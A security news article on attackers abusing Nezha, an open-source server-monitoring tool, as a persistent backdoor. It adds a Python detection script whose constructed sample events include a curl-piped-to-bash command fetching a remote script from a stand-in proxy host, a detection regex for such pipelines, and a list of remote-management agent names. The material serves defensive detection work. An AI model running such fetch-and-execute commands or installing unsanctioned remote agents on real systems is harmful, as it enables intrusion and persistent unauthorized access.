When Legitimate Tools Become Perfect Backdoors

Nezha open-source backdoor

Attack tactics keep shifting the scope of what adversaries can accomplish with tools that are already present on a system. Recent incidents have demonstrated that threat actors no longer need custom malware to establish and maintain access to target systems; many have instead turned to repurposing legitimate, open-source tools for malicious ends. Such tools are strategically appealing because they demand less investment in skills and resources and let attackers exploit the trust that users place in widely used software.

Nezha: A Monitoring Tool With a Dark Twin

Nezha is an open-source IT tool from China designed to help administrators monitor servers. It provides resource tracking, alerting, and remote maintenance, with a central dashboard for managing multiple servers. It is widely popular because it offers unified visibility across servers together with remote access capabilities.

However, the tool's most convenient functions can also be exploited by threat actors, as the Nezha-based attacks discovered by Ontinue demonstrate. Attackers can abuse its root access, file control, and web terminal capabilities to carry out malicious activity. For the devices compromised in this attack, VirusTotal shows 0/72 detections, highlighting that these attacks rely on legitimate software rather than on malware that such scanners can identify.

Post-Exploitation Has a New Playbook

The Nezha abuse attacks handled by the Ontinue SOC involved silent installation and delayed detection; the systems in place were unable to recognise the kind of activity these attacks consist of. In this case, a post-exploitation command execution was the first visible signal alerting defenders to the attack: a bash script that revealed the attacker's C2 access, the connection to the dashboard, and the use of a GitHub proxy server.

The deployment, and the fact that the attacker's presence went undetected, show that post-exploitation tooling is evolving faster than prevention efforts can keep pace with it. By abusing legitimate software rather than detectable malware, and by establishing persistent presence and control, the threat actor could potentially have compromised hundreds of endpoints connected to the central Nezha dashboard.

Living Off the Land, Revisited

The classic “living off the land” technique is no longer just about PowerShell. Attackers can use other tools and methods to establish and maintain a presence on target devices, and third-party and open-source tools increasingly serve as persistence mechanisms in modern attacks. Attacks are no longer signaled by the binaries involved; they are tied to the intent of the user running them, as legitimate tools are increasingly repurposed for malicious ends.

This shift in attack tactics must shape security strategy going forward, which requires robust controls and tools that account for a wider range of vectors and forms of threat. “This is another example of why it is important for enterprises to have a strong ‘Defense in Depth’ approach to cybersecurity,” according to John Gallagher, Vice President of Viakoo Labs at Viakoo, a Mountain View, Calif.-based provider of automated IoT cyber hygiene. “Assuming that an open source agent might have vulnerabilities or unexposed zero days is a very good assumption.”

Why Traditional Security Controls Miss This

Traditional security measures fall short against modern attacks, including those that leverage benign, open-source tools. Such security tools often rely on signature-based detection rather than the behavioral context needed to distinguish regular activity from malicious use of legitimate software.

A malware-centric approach to remote access attacks is limited because it cannot detect or prevent threats built on the abuse of legitimate tools. EDR, SIEM, and SOC workflows struggle with this abuse because they were not designed to flag malicious behavior carried out through legitimate tools. Defending against attacks like this demands behavioral analysis sophisticated enough to distinguish authentic use from malicious abuse.

Rethinking Detection in a World of Trusted Abuse

As attacks like this become more common, defenders must adjust their approach to persistent access by focusing on anomalous behavior rather than on detecting known-bad files. Execution context, infrastructure mapping, and intent are the pieces of the puzzle that security tools must be able to understand in order to protect against modern attacks. The recently discovered Nezha abuse shows that adversary tradecraft no longer has to depend on malware for persistent remote access.

“In short, we must stop viewing tools as either malicious or benign, and instead focus on usage patterns and context,” says Mayuresh Dani, Security Research Manager at Qualys Threat Research Unit, who recommends that organizations take several steps to protect against modern threats: inventory all RMM tools and RATs, configure monitoring tools to perform behavioral detection with real-time alerts, and establish appropriate restrictions on RMM tool usage to protect against abuse.
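The two preceding sections argue that detection has to key on context (which agent is running, who it talks to, what it spawns) rather than on whether a binary matches a signature, and list three concrete steps: an inventory of RMM tools, behavioral detection with alerts, and restrictions on agent usage. The script below is an added illustration of those three steps applied to process-execution telemetry; it is not code from Ontinue, Nezha, Qualys, or Security Buzz. The event schema, the approved-inventory entries, the hostnames and IP addresses, and the sample events are all constructed for the example, and `nezha-agent` is used only as an illustrative process name for the Nezha agent.

```python
"""Behavioural triage of process events for remote-management agents (added example)."""
import json
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

# Constructed inventory: sanctioned agents and the dashboard hosts each may reach.
APPROVED_AGENTS: Dict[str, Set[str]] = {
    "nezha-agent": {"monitor.corp.example"},  # hypothetical internal dashboard
}
# Process names treated as RMM / monitoring agents (illustrative, not exhaustive).
RMM_AGENT_NAMES = {"nezha-agent", "rustdesk", "anydesk", "teamviewerd"}
INTERACTIVE_SHELLS = {"bash", "sh", "zsh", "dash"}
# A download piped straight into a shell is the usual one-line agent install.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


@dataclass
class Event:
    ts: str
    host: str
    pid: int
    ppid: int
    name: str       # process image name
    user: str
    cmdline: str
    remote: str     # "host:port" of an outbound connection, or ""


@dataclass
class Finding:
    ts: str
    host: str
    rule: str
    detail: str


def parse_event(line: str) -> Event:
    """Parse one JSON-lines process event in this example's constructed schema."""
    d = json.loads(line)
    return Event(d["ts"], d["host"], int(d["pid"]), int(d["ppid"]),
                 d["name"], d["user"], d["cmdline"], d.get("remote", ""))


def triage(events: Iterable[Event]) -> List[Finding]:
    """Apply context-based rules; none of them keys on a file hash or signature."""
    findings: List[Finding] = []
    seen: Dict[Tuple[str, int], Event] = {}   # (host, pid) -> event, for parent lookup
    for ev in events:
        seen[(ev.host, ev.pid)] = ev
        # Rule 1: an RMM / monitoring agent that is not in the approved inventory.
        if ev.name in RMM_AGENT_NAMES and ev.name not in APPROVED_AGENTS:
            findings.append(Finding(ev.ts, ev.host, "unapproved_rmm_agent",
                                    f"{ev.name} pid={ev.pid} user={ev.user}"))
        # Rule 2: a sanctioned agent reporting to a dashboard it may not reach.
        # Same binary, different controller: identical signature, different intent.
        if ev.name in APPROVED_AGENTS and ev.remote:
            rhost = ev.remote.rsplit(":", 1)[0]   # assumes host:port, no IPv6 literals
            if rhost not in APPROVED_AGENTS[ev.name]:
                findings.append(Finding(ev.ts, ev.host, "agent_to_unknown_dashboard",
                                        f"{ev.name} -> {ev.remote}"))
        # Rule 3: an interactive shell whose parent is an agent (web-terminal pattern).
        parent = seen.get((ev.host, ev.ppid))
        if parent is not None and parent.name in RMM_AGENT_NAMES and ev.name in INTERACTIVE_SHELLS:
            findings.append(Finding(ev.ts, ev.host, "agent_spawned_shell",
                                    f"{parent.name} pid={parent.pid} spawned {ev.cmdline!r}"))
        # Rule 4: a remote script fetched and executed in one pipeline.
        if ev.name in INTERACTIVE_SHELLS and PIPE_TO_SHELL.search(ev.cmdline):
            findings.append(Finding(ev.ts, ev.host, "download_piped_to_shell", ev.cmdline))
    return findings


# Constructed sample events: the first three model the abuse pattern (install via a
# proxy, agent registering with an unknown dashboard, shell spawned through the agent);
# the fourth is legitimate use of the sanctioned agent; the fifth is an unapproved tool.
SAMPLE_EVENTS = [
    '{"ts":"2025-01-01T10:00:01Z","host":"web01","pid":100,"ppid":1,"name":"bash","user":"root",'
    '"cmdline":"bash -c \'curl -fsSL https://proxy.example/raw/install.sh | bash\'"}',
    '{"ts":"2025-01-01T10:00:05Z","host":"web01","pid":101,"ppid":100,"name":"nezha-agent","user":"root",'
    '"cmdline":"nezha-agent -c /etc/agent.yml","remote":"203.0.113.10:8008"}',
    '{"ts":"2025-01-01T10:02:00Z","host":"web01","pid":102,"ppid":101,"name":"bash","user":"root",'
    '"cmdline":"bash -i"}',
    '{"ts":"2025-01-01T10:03:00Z","host":"db02","pid":200,"ppid":1,"name":"nezha-agent","user":"root",'
    '"cmdline":"nezha-agent -c /etc/agent.yml","remote":"monitor.corp.example:443"}',
    '{"ts":"2025-01-01T10:04:00Z","host":"db02","pid":201,"ppid":1,"name":"rustdesk","user":"alice",'
    '"cmdline":"rustdesk"}',
]


def run_demo() -> List[Finding]:
    """Triage the constructed events and return the findings (also printed)."""
    findings = triage(parse_event(line) for line in SAMPLE_EVENTS)
    for f in findings:
        print(f"{f.ts} {f.host} [{f.rule}] {f.detail}")
    return findings


if __name__ == "__main__":
    run_demo()
```

The point of the second sample event is the one the article makes: the same agent binary that is harmless on `db02` is the finding on `web01`, and only the destination it reports to separates the two. Rule 1 is the inventory step, rules 2 and 3 are the behavioral detection step, and in practice the inventory in `APPROVED_AGENTS` is also where usage restrictions would be enforced (which hosts may run an agent, and which dashboards it may reach).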

The Bigger Lesson for Defenders

Defenders must understand that trust is now conditional, resting on behavior and intent rather than on binary detection. The existence and widespread use of open-source software is not the problem underlying these attacks; the lack of visibility into how that software is being used is. Security teams must assume that attackers will keep using ostensibly benign tools for malicious purposes, because the abuse of legitimate software is both appealing and profitable for threat actors.

Author

PJ Bradley, Contributing Writer, Security Buzz

PJ Bradley is a writer from southeast Michigan with a Bachelor's degree in history from Oakland University. She has a background in school-age care and experience tutoring college history students.